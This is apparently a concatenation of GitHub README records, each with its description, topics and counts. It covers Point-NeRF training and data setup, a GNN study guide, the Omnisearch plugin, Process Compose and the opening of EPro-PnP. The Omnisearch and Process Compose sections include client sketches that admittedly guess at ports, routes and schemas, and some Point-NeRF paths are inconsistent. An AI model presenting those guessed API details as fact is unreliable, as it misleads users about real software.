2. We have received constructive feedback that when Point-NeRF uses MVSNet to reconstruct the point cloud, the point fusion after depth estimation by MVSNet uses the alpha channel information in the NeRF-Synthetic dataset. This is because MVSNet cannot handle the background very well. To improve fairness, we include new training scripts and results of PointNeRF + MVSNet when using the background color for filtering. The results (see below) are similar to the ones previously reported.

|           | Chair | Drums | Lego  | Mic   | Materials | Ship  | Hotdog | Ficus | Avg   |
| ----      | ----  | ----  | ---   | ----  | ----      | ----  | ------ | ----- | ----- |
| PSNR      | 35.60 | 26.04 | 35.27 | 35.91 | 29.65     | 30.61 | 37.34  | 35.61 | 33.25 |
| SSIM      | 0.991 | 0.954 | 0.989 | 0.994 | 0.971     | 0.938 | 0.991  | 0.992 | 0.978 |
| LPIPSVgg  | 0.023 | 0.078 | 0.021 | 0.014 | 0.071     | 0.129 | 0.036  | 0.025 | 0.050 |
| LPIPSAlex | 0.010 | 0.055 | 0.010 | 0.007 | 0.041     | 0.076 | 0.016  | 0.011 | 0.028 |

This issue only affects situations where Point-NeRF uses MVSNet on the NeRF-Synthetic dataset. The Colmap results and results on other datasets are not impacted. An even more reasonable reconstruction approach should exclude using knowledge of the background color or other point filtering. Therefore, we suggest users combine PointNeRF with more powerful MVS models, such as [TransMVS](https://github.com/megvii-research/TransMVSNet).

## Overall Instructions

1. Please first install the libraries as below and download/prepare the datasets as instructed.
2. Point Initialization: Download the pre-trained MVSNet as below and train the feature extraction from scratch, or directly download the pre-trained models. (Obtain the 'MVSNet' and 'init' folders in the checkpoints folder.)
3. Per-scene Optimization: Download pre-trained models or optimize from scratch as instructed.

For nerfsynthetic, colmap_nerfsynthetic, tanks&temples, scannet and dtu, we provide all the checkpoint files [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing) | [baidu wangpan](https://pan.baidu.com/s/1doJHI03Tgl_qIquGZuW5bw?pwd=p8bs); all the images and scores of the test results [google drive](https://drive.google.com/drive/folders/1KAYs7XuBJNMTHVBuOCtpLNv9P8UMoayw?usp=sharing) | [baidu wangpan](https://pan.baidu.com/s/1BMewWRSIkNFlp7DKYmx9vQ?pwd=3yse); and video results [google drive](https://drive.google.com/drive/folders/1dutZEZO9vfeIbfWwplbIIam7YBeyZ0dY?usp=sharing) | [baidu wangpan](https://pan.baidu.com/s/1kC1qSL5dkT8cDdE3dHTc2A?pwd=j46j).

We also share the visual results of [npbg](https://github.com/alievk/npbg), [nsvf](https://github.com/facebookresearch/NSVF) and [ibrnet](https://github.com/googleinterns/IBRNet) on the NeRF Synthetic dataset generated by our machine [google drive](https://drive.google.com/drive/folders/1KHhljnqLvIJkRkaqQ8TaeBZirMsnDAhf?usp=sharing); please cite their papers accordingly if interested.

## Installation

### Requirements

All the code is tested in the following environment:

* Linux (tested on Ubuntu 16.04, 18.04, 20.04)
* Python 3.6+
* PyTorch 1.7 or higher (tested on PyTorch 1.7, 1.8.1, 1.9, 1.10)
* CUDA 10.2 or higher

### Install

Install the dependent libraries as follows:

* Install the dependent python libraries:

```
pip install torch==1.8.1+cu102 h5py
pip install imageio scikit-image
```

* Install pycuda (crucial) following: https://documen.tician.de/pycuda/install.html
* Install torch_scatter following: https://github.com/rusty1s/pytorch_scatter

We developed our code with pytorch 1.8.1, pycuda 2021.1, and torch_scatter 2.0.8.

## Data Preparation

The layout should look like this; we provide all data folders here: [google_drive](https://drive.google.com/drive/folders/1-Fn5g-NgHC0RcyWapHdfsqbSQksTgB4N?usp=sharing), except for scannet (we took it down on Mar 8th 2023 to respect ScanNet's policy; please go to ScanNet's official website for the data).

```
pointnerf
├── data_src
│   ├── dtu
│   │   │──Cameras
│   │   │──Depths
│   │   │──Depths_raw
│   │   │──Rectified
├── nerf
│   │   │──nerf_synthetic
│   │   │──nerf_synthetic_colmap
├── TanksAndTemple
├── scannet
│   │   │──scans
|   │   │   │──scene0101_04
|   │   │   │──scene0241_01
```

Or you can download using the official links as follows:

## DTU:

Download the preprocessed [DTU training data](https://drive.google.com/file/d/1eDjh-_bxKKnEuz5h-HXS7EDJn59clx6V/view) and [Depth_raw](https://virutalbuy-public.oss-cn-hangzhou.aliyuncs.com/share/cascade-stereo/CasMVSNet/dtu_data/dtu_train_hr/Depths_raw.zip) from the original [MVSNet repo](https://github.com/YoYo000/MVSNet) and unzip.
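A minimal sketch of placing the two DTU archives into the layout above (the zip file names are assumptions; use whatever names your downloads produce, and adjust the destination if an archive contains an extra top-level folder):

```bash
mkdir -p data_src/dtu
unzip dtu_training.zip -d data_src/dtu   # should yield Cameras/, Depths/, Rectified/
unzip Depths_raw.zip -d data_src/dtu     # should yield Depths_raw/
```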
## NeRF Synthetic
Download `nerf_synthetic.zip` from [here](https://drive.google.com/drive/folders/128yBriW1IG_3NJ5Rp7APSTZsJqdJdfc1) under ``data_src/nerf/''

## Tanks & Temples
Follow Neural Sparse Voxel Fields and download [Tanks&Temples](https://www.tanksandtemples.org/) | [download (.zip)](https://dl.fbaipublicfiles.com/nsvf/dataset/TanksAndTemple.zip) | 0_\* (training) 1_\* (testing) as: ``data_src/TanksAndTemple/''

## ScanNet
Download and extract ScanNet by following the instructions provided at http://www.scan-net.org/. The detailed steps include:
* Go to http://www.scan-net.org and fill & send the request form.
* You will get an email with command instructions and a download-scannet.py file. That file is for Python 2; you can use our download-scannet.py in the ``data'' directory for Python 3.
* Clone the official repo:
```
git clone https://github.com/ScanNet/ScanNet.git
```
* Download the specific scenes (used by NSVF):
```
python data/download-scannet.py -o ../data_src/scannet/ --id scene0101_04
python data/download-scannet.py -o ../data_src/scannet/ --id scene0241_01
```
* Process the sens files:
```
python ScanNet/SensReader/python/reader.py --filename data_src/nrData/scannet/scans/scene0101_04/scene0101_04.sens  --output_path data_src/nrData/scannet/scans/scene0101_04/exported/  --export_depth_images --export_color_images --export_poses --export_intrinsics
python ScanNet/SensReader/python/reader.py --filename data_src/nrData/scannet/scans/scene0241_01/scene0241_01.sens  --output_path data_src/nrData/scannet/scans/scene0241_01/exported/  --export_depth_images --export_color_images --export_poses --export_intrinsics
```

## Point Initialization / Generalization:
### &nbsp; Download pre-trained MVSNet checkpoints:
We trained [MVSNet](https://github.com/xy-guo/MVSNet_pytorch) on DTU. You can download the ''MVSNet'' directory from [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing) and place it under ''checkpoints/''

### &nbsp; Train 2D feature extraction and point representation
##### &nbsp; Directly use our trained checkpoint files:
Download the ''init'' directory from [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing) and place it under ''checkpoints/''

##### &nbsp; Or train from scratch:
Train for point features of 63 channels (as in the paper):
```
bash dev_scripts/ete/dtu_dgt_d012_img0123_conf_color_dir_agg2.sh
```
Train for point features of 32 channels (better for per-scene optimization):
```
bash dev_scripts/ete/dtu_dgt_d012_img0123_conf_agg2_32_dirclr20.sh
```
After the training, you should pick a checkpoint and rename it as the best checkpoint, e.g.:
```
cp checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/250000_net_ray_marching.pth checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/best_net_ray_marching.pth
cp checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/250000_net_mvs.pth checkpoints/dtu_dgt_d012_img0123_conf_color_dir_agg2/best_net_mvs.pth
```
### &nbsp; Test feed-forward inference on DTU scenes
These scenes were selected by MVSNeRF; please also refer to their code to understand the metric calculation.
```
bash dev_scripts/dtu_test_inf/inftest_scan1.sh
bash dev_scripts/dtu_test_inf/inftest_scan8.sh
bash dev_scripts/dtu_test_inf/inftest_scan21.sh
bash dev_scripts/dtu_test_inf/inftest_scan103.sh
bash dev_scripts/dtu_test_inf/inftest_scan114.sh
```

## Per-scene Optimization:
<img src="https://github.com/Xharlie/xharlie.github.io/raw/master/projects/project_sites/pointnerf/vid/ficus.gif" width="45%" /><img src="https://github.com/Xharlie/xharlie.github.io/raw/master/projects/project_sites/pointnerf/vid/scene101.gif" width="50%" />
<img src="https://github.com/Xharlie/xharlie.github.io/raw/master/projects/project_sites/pointnerf/vid/truck.gif" width="70%" />

(Please visit the project sites to see the original videos of the above scenes, which lose quality when converted to gif files here.)

### Download per-scene optimized Point-NeRFs
You can skip training and download the folders ''nerfsynth'', ''tanksntemples'' and ''scannet'' here [google drive](https://drive.google.com/drive/folders/1xk1GhDhgPk1MrlX8ncfBz5hNMvSa9vS6?usp=sharing), and place them in ''checkpoints/''.
```
pointnerf
├── checkpoints
│   ├── init
│   ├── MVSNet
│   ├── nerfsynth
│   ├── col_nerfsynth
│   ├── scannet
│   ├── tanksntemples
```
In each scene, we provide the initialized point features and network weights ''0_net_ray_marching.pth'', and the points and weights at 20K steps ''20000_net_ray_marching.pth'' and 200K steps ''200000_net_ray_marching.pth''.

### Test the per-scene optimized Point-NeRFs
#### NeRF Synthetics
<details>
  <summary>test scripts</summary>

```
bash dev_scripts/w_n360/chair_test.sh
bash dev_scripts/w_n360/drums_test.sh
bash dev_scripts/w_n360/ficus_test.sh
bash dev_scripts/w_n360/hotdog_test.sh
bash dev_scripts/w_n360/lego_test.sh
bash dev_scripts/w_n360/materials_test.sh
bash dev_scripts/w_n360/mic_test.sh
bash dev_scripts/w_n360/ship_test.sh
```
</details>

#### ScanNet
<details>
  <summary>test scripts</summary>

```
bash dev_scripts/w_scannet_etf/scane101_test.sh
bash dev_scripts/w_scannet_etf/scane241_test.sh
```
</details>

#### Tanks & Temples
<details>
  <summary>test scripts</summary>

```
bash dev_scripts/w_tt_ft/barn_test.sh
bash dev_scripts/w_tt_ft/caterpillar_test.sh
bash dev_scripts/w_tt_ft/family_test.sh
bash dev_scripts/w_tt_ft/ignatius_test.sh
bash dev_scripts/w_tt_ft/truck_test.sh
```
</details>

### Per-scene optimization from scratch
Make sure the ''checkpoints'' folder has ''init'' and ''MVSNet''. The training scripts will start with initialization if there are no ''.pth'' files in a scene folder; otherwise they will start from the last ''.pth'' file and run until reaching the iteration set by ''maximum_step''.
#### NeRF Synthetics using MVSNet (w/ alpha channel filtering during point cloud reconstruction and pycuda)
<details>
  <summary>train scripts</summary>

```
bash dev_scripts/w_n360/chair.sh
bash dev_scripts/w_n360/drums.sh
bash dev_scripts/w_n360/ficus.sh
bash dev_scripts/w_n360/hotdog.sh
bash dev_scripts/w_n360/lego.sh
bash dev_scripts/w_n360/materials.sh
bash dev_scripts/w_n360/mic.sh
bash dev_scripts/w_n360/ship.sh
```
</details>

#### NeRF Synthetics using MVSNet (w/ background color filtering during point cloud reconstruction and PyTorch CUDA)
<details>
  <summary>train scripts</summary>

```
bash dev_scripts/w_n360/chair_cuda.sh
bash dev_scripts/w_n360/drums_cuda.sh
bash dev_scripts/w_n360/ficus_cuda.sh
bash dev_scripts/w_n360/hotdog_cuda.sh
bash dev_scripts/w_n360/lego_cuda.sh
bash dev_scripts/w_n360/materials_cuda.sh
bash dev_scripts/w_n360/mic_cuda.sh
bash dev_scripts/w_n360/ship_cuda.sh
```
</details>

#### NeRF Synthetics using COLMAP points
Please download the COLMAP data (see above). If there are {maximum_step}.pth checkpoint files in the path, the scripts below will also run testing.
<details>
  <summary>train scripts</summary>

```
bash dev_scripts/w_colmap_n360/col_chair.sh
bash dev_scripts/w_colmap_n360/col_drums.sh
bash dev_scripts/w_colmap_n360/col_ficus.sh
bash dev_scripts/w_colmap_n360/col_hotdog.sh
bash dev_scripts/w_colmap_n360/col_lego.sh
bash dev_scripts/w_colmap_n360/col_materials.sh
bash dev_scripts/w_colmap_n360/col_mic.sh
bash dev_scripts/w_colmap_n360/col_ship.sh
```
</details>

#### ScanNet
<details>
  <summary>train scripts</summary>

```
bash dev_scripts/w_scannet_etf/scene101.sh
bash dev_scripts/w_scannet_etf/scene241.sh
```
</details>

#### Tanks & Temples
<details>
  <summary>train scripts</summary>

```
bash dev_scripts/w_tt_ft/barn.sh
bash dev_scripts/w_tt_ft/caterpillar.sh
bash dev_scripts/w_tt_ft/family.sh
bash dev_scripts/w_tt_ft/ignatius.sh
bash dev_scripts/w_tt_ft/truck.sh
```
</details>

## Acknowledgement
Our repo is developed based on [MVSNet](https://github.com/YoYo000/MVSNet), [NeRF](https://github.com/bmild/nerf), [MVSNeRF](https://github.com/apchenstu/mvsnerf), and [NSVF](https://github.com/facebookresearch/NSVF). Please also consider citing the corresponding papers.

The project is conducted collaboratively between Adobe Research and the University of Southern California.

## LICENSE
The repo is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 2.0 and is restricted to academic use only. See [LICENSE](https://github.com/Xharlie/pointnerf/blob/master/LICENSE.md).
Point-NeRF: Point-based Neural Radiance Fields
nerf,point-cloud,point-based-graphics,volume-rendering,differentiable-rendering,neural-rendering,neural-renderer,mvs,multiview-stereo,reconstruction
0
3
3
44
68
1
0
xiaorouji/openwrt-passwall2
null
null
null
43
31
66
392
11
1
2
dair-ai/GNNs-Recipe
# Graph Neural Networks (GNNs) Study Guide

![](/gnn.jpeg)

Graph neural networks (GNNs) are rapidly advancing progress in ML for complex graph data applications. I've composed this concise recipe (i.e., studysheet) dedicated to students who are looking to learn and keep up-to-date with GNNs. It's non-exhaustive, but it aims to get students familiar with the topic.

## ⭐ Gentle Introduction to GNNs

There is plenty of introductory content for learning about GNNs. The following are some useful resources:

🔗 [Foundations of GNNs](https://www.youtube.com/watch?v=uF53xsT7mjc) (by Petar Veličković)

🔗 [Gentle Introduction to GNNs](https://distill.pub/2021/gnn-intro/) (by Distill)

🔗 [Understanding Convolutions on Graphs](https://distill.pub/2021/understanding-gnns/) (by Distill)

🔗 [Math Behind Graph Neural Networks](https://rish-16.github.io/posts/gnn-math/) (by Rishabh Anand)

🔗 [Graph Convolutional Networks](http://tkipf.github.io/graph-convolutional-networks/) (by Thomas Kipf)

🔗 [Graph Neural Networks for Geometric Graphs - Chaitanya K. Joshi, Simon V. Mathis](https://youtu.be/VKj5wzZsoK4)

## 📘 Survey Papers on GNNs

Here are a few fantastic survey papers on the topic to get a broader and more concise picture of GNNs and recent progress:

🔗 [Graph Neural Networks: A Review of Methods and Applications](https://arxiv.org/abs/1812.08434) (Jie Zhou, Ganqu Cui, Shengding Hu, Zhengyan Zhang, Cheng Yang, Zhiyuan Liu, Lifeng Wang, Changcheng Li, Maosong Sun)

🔗 [Graph Neural Networks: Methods, Applications, and Opportunities](https://arxiv.org/abs/2108.10733) (Lilapati Waikhom, Ripon Patgiri)

🔗 [A Comprehensive Survey on Graph Neural Networks](https://arxiv.org/abs/1901.00596) (Zonghan Wu, Shirui Pan, Fengwen Chen, Guodong Long, Chengqi Zhang, Philip S. Yu)

## 👩‍💻 Diving Deep into GNNs

After going through the quick high-level introductory content, here is some great material to go deep:

🔗 [Geometric Deep Learning](https://geometricdeeplearning.com/) (by Michael M. Bronstein, Joan Bruna, Taco Cohen, Petar Veličković)

🔗 [Graph Representation Learning Book](https://www.cs.mcgill.ca/~wlh/grl_book/) (by William Hamilton)

🔗 [CS224W: ML with Graphs](https://www.youtube.com/playlist?list=PLoROMvodv4rPLKxIpqhjhPgdQy7imNkDn) (by Jure Leskovec)

## 📚 GNN Papers and Implementations

If you want to keep up-to-date with popular recent methods and paper implementations for GNNs, the Papers with Code community maintains this useful collection:

🐙 [Graph Models by Papers with Code](https://paperswithcode.com/methods/category/graph-models)

## 📈 Benchmarks and Datasets

If you are interested in benchmarks/leaderboards and graph datasets that evaluate GNNs, the Papers with Code community also maintains such content here:

🔗 [Datasets by Papers with Code](https://paperswithcode.com/datasets?mod=graphs&page=1)

🔗 [Graph Benchmarks by Papers with Code](https://paperswithcode.com/area/graphs)

## :octocat: Tools

Here are a few useful tools to get started with GNNs:

🔥 [PyTorch Geometric](https://pytorch-geometric.readthedocs.io/en/latest/#)

🔗 [Deep Graph Library](https://www.dgl.ai/)

🦒 [jraph](https://github.com/deepmind/jraph)

🟠 [Spektral](https://graphneural.network/)

## 🎁 Tutorials

I will be posting several tutorials on GNNs; here is the first of the series. More coming soon!
<table>
  <tr>
    <td>Introduction to GNNs with PyTorch Geometric</td>
    <td><a href="https://colab.research.google.com/drive/1d0jLDwgNBtjBVQOFe8lO_1WrqTVeVZx9?usp=sharing">
      <img src="https://colab.research.google.com/assets/colab-badge.svg">
    </a></td>
  </tr>
</table>

---

To get regular updates on new ML and NLP resources, follow me on [Twitter](https://twitter.com/omarsar0).
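## 🧪 Bonus: A Minimal GNN in Code

If you'd rather start from runnable code, below is a minimal two-layer GCN trained on the Cora citation dataset with PyTorch Geometric (listed in the Tools section above). Treat it as a standard textbook sketch with illustrative, untuned hyperparameters rather than a reference implementation:

```python
# Minimal GCN node classification on Cora with PyTorch Geometric.
import torch
import torch.nn.functional as F
from torch_geometric.datasets import Planetoid
from torch_geometric.nn import GCNConv

dataset = Planetoid(root="data/Planetoid", name="Cora")  # downloads on first run
data = dataset[0]  # one graph: 2708 papers (nodes) linked by citations (edges)

class GCN(torch.nn.Module):
    def __init__(self, hidden=16):
        super().__init__()
        self.conv1 = GCNConv(dataset.num_node_features, hidden)
        self.conv2 = GCNConv(hidden, dataset.num_classes)

    def forward(self, x, edge_index):
        x = F.relu(self.conv1(x, edge_index))
        x = F.dropout(x, p=0.5, training=self.training)
        return self.conv2(x, edge_index)

model = GCN()
optimizer = torch.optim.Adam(model.parameters(), lr=0.01, weight_decay=5e-4)

model.train()
for epoch in range(200):
    optimizer.zero_grad()
    logits = model(data.x, data.edge_index)
    loss = F.cross_entropy(logits[data.train_mask], data.y[data.train_mask])
    loss.backward()
    optimizer.step()

model.eval()
pred = model(data.x, data.edge_index).argmax(dim=1)
acc = (pred[data.test_mask] == data.y[data.test_mask]).float().mean().item()
print(f"test accuracy: {acc:.3f}")
```

GCN baselines on Cora are commonly reported around 0.81 test accuracy, so use that as a rough sanity check.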
๐ŸŸ  A study guide to learn about Graph Neural Networks (GNNs)
graph-neural-networks,deep-learning,machine-learning,graph,graph-convolutional-networks
0
3
3
15
0
2
0
scambier/obsidian-omnisearch
# Omnisearch for Obsidian

[![Sponsor me](https://img.shields.io/badge/%E2%9D%A4%20Like%20this%20plugin%3F-Sponsor%20me!-ff69b4)](https://github.com/sponsors/scambier)

![Obsidian plugin](https://img.shields.io/endpoint?url=https%3A%2F%2Fscambier.xyz%2Fobsidian-endpoints%2Fomnisearch.json)
![GitHub release (latest by date and asset)](https://img.shields.io/github/downloads/scambier/obsidian-omnisearch/latest/main.js)
![GitHub release (latest by date including pre-releases)](https://img.shields.io/github/v/release/scambier/obsidian-omnisearch)
![GitHub release (latest by date including pre-releases)](https://img.shields.io/github/v/release/scambier/obsidian-omnisearch?include_prereleases&label=BRAT%20beta)

> 🏆 Winner of the _[2023 Gems of the Year](https://obsidian.md/blog/2023-goty-winners/)_ in the "Existing plugin" category 🏆

---

**Omnisearch** is a search engine that "_just works_". It always instantly shows you the most relevant results, thanks to its smart weighting algorithm.

Under the hood, it uses the excellent [MiniSearch](https://github.com/lucaong/minisearch) library. This free plugin is totally unrelated to the omnisearch.ai paid product.

![](https://raw.githubusercontent.com/scambier/obsidian-omnisearch/master/images/omnisearch.gif)

## Documentation

https://publish.obsidian.md/omnisearch/Index

## Installation

- Omnisearch is available on [the official Community Plugins repository](https://obsidian.md/plugins?search=Omnisearch).
- Beta releases can be installed through [BRAT](https://github.com/TfTHacker/obsidian42-brat). **Be advised that those versions can be buggy and break things.**

You can check the [CHANGELOG](./CHANGELOG.md) for more information on the different versions.

## Features

> Omnisearch's first goal is to _locate_ files instantly. You can see it as a _Quick Switcher_ on steroids.

- Find your **📝notes, 📄PDFs, and 🖼images** faster than ever
  - Images and PDF indexing is available through [Text Extractor](https://github.com/scambier/obsidian-text-extractor)
- Automatic document scoring using the [BM25 algorithm](https://github.com/lucaong/minisearch/issues/129#issuecomment-1046257399)
  - The relevance of a document against a query depends on the number of times the query terms appear in the document, its filename, and its headings
- Keyboard first: you never have to use your mouse
- Workflow similar to the "Quick Switcher" core plugin
- Opt-in local HTTP server to query Omnisearch from outside of Obsidian (see the example at the end of this section)
- Resistance to typos
- Switch between Vault and In-file search to quickly skim multiple results in a single note
- Supports `"expressions in quotes"` and `-exclusions`
- Filter file types with `.jpg` or `.md`
- Directly insert a `[[link]]` from the search results
- Supports Vim navigation keys

**Note:** support for Chinese depends on [this additional plugin](https://github.com/aidenlx/cm-chs-patch). Please read its documentation for more information.
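The opt-in HTTP server from the feature list can be queried from any language. The sketch below is illustrative only: the port is whatever you configured in Omnisearch's settings, and the `/search` route and result schema are assumptions on our part, so check the [documentation](https://publish.obsidian.md/omnisearch/Index) for the actual API:

```python
# Illustrative sketch only: PORT is whatever you set in Omnisearch's settings,
# and the '/search' route is an assumption -- verify it against the plugin docs.
import json
import urllib.parse
import urllib.request

PORT = 51361  # assumption: replace with the port shown in Omnisearch's settings
query = "graph neural networks"

url = f"http://localhost:{PORT}/search?q={urllib.parse.quote(query)}"
with urllib.request.urlopen(url) as resp:
    results = json.load(resp)

for hit in results:
    print(hit)  # the result schema depends on the plugin version
```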
## Projects that use Omnisearch

_Submit a PR to add your own project!_

- [Omnisearch Companion](https://github.com/ALegendsTale/omnisearch-companion), an extension for your browser ([Firefox](https://addons.mozilla.org/en-US/firefox/addon/omnisearch-companion/), [Chrome](https://chromewebstore.google.com/detail/omnisearch-companion/kcjcnnlpfbilodfnnkpioijobpjhokkd))
- [Actions for Obsidian](https://actions.work/actions-for-obsidian)
- [Userscripts](https://publish.obsidian.md/omnisearch/Inject+Omnisearch+results+into+your+search+engine) to inject Omnisearch into your favorite web search engine

## LICENSE

Omnisearch is licensed under [GPL-3](https://tldrlegal.com/license/gnu-general-public-license-v3-(gpl-3)).

## Thanks

To all people who donate through [Ko-Fi](https://ko-fi.com/scambier) or [Github Sponsors](https://github.com/sponsors/scambier) ❤

![JetBrains Logo (Main) logo](https://resources.jetbrains.com/storage/products/company/brand/logos/jb_beam.svg)
A search engine that "just works" for Obsidian. Supports OCR and PDF indexing.
minisearch,obsidian,obsidian-md,obsidian-plugin,search,ocr,pdf
135
17
38
767
44
5
1
F1bonacc1/process-compose
## Process Compose

[![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](https://go.dev/)
[![Maintenance](https://img.shields.io/badge/Maintained%3F-yes-green.svg)](https://GitHub.com/F1bonacc1/process-compose/graphs/commit-activity)
[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](http://makeapullrequest.com)
![Go Report](https://goreportcard.com/badge/github.com/F1bonacc1/process-compose)
[![Releases](https://img.shields.io/github/downloads/F1bonacc1/process-compose/total.svg)]()
![X (formerly Twitter) URL](https://img.shields.io/twitter/url?url=https%3A%2F%2Ftwitter.com%2FProcessCompose&style=flat&logo=x&label=Process%20Compose)

Process Compose is a simple and flexible scheduler and orchestrator to manage non-containerized applications.

**Why?** Because sometimes you just don't want to deal with docker files, volume definitions, networks and docker registries.

Since it's written in Go, Process Compose is a single binary file and has no other dependencies.

Once [installed](https://f1bonacc1.github.io/process-compose/installation/), you just need to describe your workflow using a simple [YAML](http://yaml.org/) schema in a file called `process-compose.yaml`:

```yaml
version: "0.5"

processes:
  hello:
    command: echo 'Hello World'
  pc:
    command: echo 'From Process Compose'
    depends_on:
      hello:
        condition: process_completed
```

And start it by running `process-compose` from your terminal.

Check the [Documentation](https://f1bonacc1.github.io/process-compose/launcher/) for more advanced use cases.

#### Features:

- Process execution (in parallel and/or serially)
- Process dependencies and startup order
- Process recovery policies
- Manual process [re]start
- Process arguments in `bash` or `zsh` style (or define your own shell)
- Per-process and global environment variables
- Per-process or global (single file) logs
- Health checks (liveness and readiness)
- Terminal User Interface (TUI) or CLI modes
- Forking (services or daemons) processes
- REST API (OpenAPI a.k.a Swagger); see the illustrative client sketch at the end of this README
- Logs caching
- Functions as both server and client
- Configurable shortcuts
- Merge Configuration Files
- Namespaces
- Run Multiple Replicas of a Process
- Run a Foreground Process
- Themes Support

It is heavily inspired by [docker-compose](https://github.com/docker/compose), but without the need for containers. The configuration syntax tries to follow the docker-compose specifications, with a few minor additions and lots of subtractions.

<img src="./imgs/tui.png" alt="TUI" style="zoom:67%;" />

## Get Process Compose

[Installation Instructions](https://f1bonacc1.github.io/process-compose/installation/)

## Documentation

[Quick Start](https://f1bonacc1.github.io/process-compose/intro/)

[Documentation](https://f1bonacc1.github.io/process-compose/launcher/)

## How to Contribute

1. Fork it
2. Create your feature branch (git checkout -b my-new-feature)
3. Commit your changes (git commit -am 'Add some feature')
4. Push to the branch (git push origin my-new-feature)
5. Create a new Pull Request

English is not my native language, so PRs correcting grammar or spelling are welcome and appreciated.

### Consider supporting the project ❤️

##### Github (preferred)
https://github.com/sponsors/F1bonacc1

##### Bitcoin
<img src="./imgs/btc.wallet.qr.png" style="zoom:50%;" alt="3QjRfBzwQASQfypATTwa6gxwUB65CX1jfX"/>

3QjRfBzwQASQfypATTwa6gxwUB65CX1jfX

Thank **You**!
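Since Process Compose functions as both server and client, its REST API (see the Features list above) can be scripted from any language. The sketch below is illustrative only: the address and the route name are assumptions on our part, so consult the OpenAPI/Swagger documentation for your version before relying on it:

```python
# Illustrative sketch (assumptions marked): list processes via the REST API.
import json
import urllib.request

BASE = "http://localhost:8080"  # assumption: adjust to where the server listens

# '/processes' is an assumed route -- verify it in the Swagger/OpenAPI docs.
with urllib.request.urlopen(f"{BASE}/processes") as resp:
    payload = json.load(resp)

for proc in payload.get("data", []):
    print(proc.get("name"), "->", proc.get("status"))
```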
Process Compose is a simple and flexible scheduler and orchestrator to manage non-containerized applications.
go,golang,open-source,orchestration,orchestrator,processes,tui,workflows,docker
45
14
45
393
16
8
3
tjiiv-cprg/EPro-PnP
# EPro-PnP ๐Ÿ“ข **NEWS:** We have released [EPro-PnP-v2](https://github.com/tjiiv-cprg/EPro-PnP-v2). A new updated preprint can be found on [arXiv](https://arxiv.org/abs/2303.12787). **EPro-PnP: Generalized End-to-End Probabilistic Perspective-n-Points for Monocular Object Pose Estimation** <br> In CVPR 2022 (Oral, **Best Student Paper**). [[paper](https://arxiv.org/pdf/2203.13254.pdf)][[video](https://www.youtube.com/watch?v=TonBodQ6EUU)] <br> [Hansheng Chen](https://lakonik.github.io/)\*<sup>1,2</sup>, [Pichao Wang](https://wangpichao.github.io/)โ€ <sup>2</sup>, [Fan Wang](https://scholar.google.com/citations?user=WCRGTHsAAAAJ&hl=en)<sup>2</sup>, [Wei Tian](https://scholar.google.com/citations?user=aYKQn88AAAAJ&hl=en)โ€ <sup>1</sup>, [Lu Xiong](https://www.researchgate.net/scientific-contributions/Lu-Xiong-71708073)<sup>1</sup>, [Hao Li](https://scholar.google.com/citations?user=pHN-QIwAAAAJ&hl=zh-CN)<sup>2</sup> <sup>1</sup>Tongji University, <sup>2</sup>Alibaba Group <br> \*Part of work done during an internship at Alibaba Group. <br> โ€ Corresponding Authors: Pichao Wang, Wei Tian. ## Introduction EPro-PnP is a probabilistic Perspective-n-Points (PnP) layer for end-to-end 6DoF pose estimation networks. Broadly speaking, it is essentially a continuous counterpart of the widely used categorical Softmax layer, and is theoretically generalizable to other learning models with nested <!-- $\mathrm{arg\,min}$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?%5Cmathrm%7Barg%5C%2Cmin%7D"> optimization. <img src="intro.png" width="500" alt=""/> Given the layer input: an <!-- $N$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?N">-point correspondence set <!-- $X = \left\{x^\text{3D}_i,x^\text{2D}_i,w^\text{2D}_i\,\middle|\,i=1\cdots N\right\}$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?X%20%3D%20%5Cleft%5C%7Bx%5E%5Ctext%7B3D%7D_i%2Cx%5E%5Ctext%7B2D%7D_i%2Cw%5E%5Ctext%7B2D%7D_i%5C%2C%5Cmiddle%7C%5C%2Ci%3D1%5Ccdots%20N%5Cright%5C%7D"> consisting of 3D object coordinates <!-- $x^\text{3D}_i \in \mathbb{R}^3$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?x%5E%5Ctext%7B3D%7D_i%20%5Cin%20%5Cmathbb%7BR%7D%5E3">, 2D image coordinates <!-- $x^\text{2D}_i \in \mathbb{R}^2$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?x%5E%5Ctext%7B2D%7D_i%20%5Cin%20%5Cmathbb%7BR%7D%5E2">, and 2D weights <!-- $w^\text{2D}_i \in \mathbb{R}^2_+ $ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?w%5E%5Ctext%7B2D%7D_i%20%5Cin%20%5Cmathbb%7BR%7D%5E2_%2B">, a conventional PnP solver searches for an optimal pose <!-- $y^\ast$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?y%5E%5Cast"> (rigid transformation in SE(3)) that minimizes the weighted reprojection error. Previous work tries to backpropagate through the PnP operation, yet <!-- $y^\ast$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?y%5E%5Cast"> is inherently non-differentiable due to the inner <!-- $\mathrm{arg\,min}$ --> <img style="transform: translateY(0.1em); background: white;" src="https://latex.codecogs.com/svg.latex?%5Cmathrm%7Barg%5C%2Cmin%7D"> operation. 
